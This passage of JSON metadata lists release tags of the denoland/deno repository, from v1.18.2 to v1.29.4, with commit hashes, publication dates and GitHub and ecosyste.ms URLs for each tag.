023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/rel